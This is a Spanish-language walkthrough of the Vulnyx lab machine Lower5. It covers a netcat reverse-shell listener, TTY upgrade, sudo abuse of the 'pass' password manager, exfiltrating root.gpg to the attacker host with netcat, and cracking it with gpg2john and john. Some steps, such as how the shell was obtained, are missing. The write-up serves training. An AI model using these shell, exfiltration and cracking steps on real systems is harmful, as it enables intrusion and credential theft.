Máquina Lower5 (Vulnyx)
Comenzamos con averiguar la dirección IP de la Máquina Victima, para ello primeramente utilizaremos la herramienta netdiscover, para ello ejecutamos el siguiente comando:
- Kali (Máquina Atacante): 10.0.2.4
- Máquina Victima: 10.0.2.33
$ nc -lvnp 443
Recargamos la pagina web.
Obtenemos una shell como www-data.
A continuación, hacemos un tratamiento de la TTY para obtener una shell interactiva y así evitar problemas, para ello ejecutamos los siguientes comandos:
$ script /dev/null -c bash
Ctrl + Z
$ stty raw -echo;fg
$ reset xterm
$ export TERM=xterm
Enumeramos los permisos sudo, para ello ejecutamos el siguiente comando:
$ sudo -l
$ sudo -l
Nos encontramos con el binario pass que lo podemos ejecutar como el usuario root, buscando información sobre este binario veo que se trata de un gestor de contraseñas.
Lo ejecutamos de la siguiente manera:
$ sudo -u root /usr/bin/pass
Vemos una entrada llamada root/password, por lo tanto, accedemos a ella, para ello ejecutamos el siguiente comando:
$ sudo -u root /usr/bin/pass root/password
Nos pide una contraseña.
Enumeramos el directorio /home del usuario low.
Y nos encontramos el fichero root.gpg.
Nos pasamos este fichero a nuestra Máquina Atacante, con la ayuda de la herramienta netcat (nc), para ello en nuestra terminal de la Máquina Atacante abrimos un listener por el puerto 8080 y lo redireccionamos todo lo que entre por ese puerto al fichero root.gpg, para ello ejecutamos el siguiente comando:
$ nc -lvnp 8080 > root.gpg
En la Máquina Victima situados en donde se encuentra el archivo, iniciamos una conexión a nuestra Máquina Atacante redirigiendo el archivo root.gpg, para ello ejecutamos el siguiente comando:
$ nc 10.0.2.4 8080 < root.gpg
Extraemos el hash del archivo root.gpg con la herramienta gpg2john, para ello ejecutamos el siguiente comando:
$ gpg2john root.gpg > hash
A continuación, intentamos crackearlo, para ello utilizamos la herramienta john indicando el diccionario rockyou, para ello ejecutamos el siguiente comando:
$ john hash --wordlist=./Descargas/rockyou.txt
Y obtenemos la contraseña Password1.
Ejecutamos de nuevo el binario pass, para ello ejecutamos nuevamente el siguiente comando:
$ sudo -u root /usr/bin/pass root/password















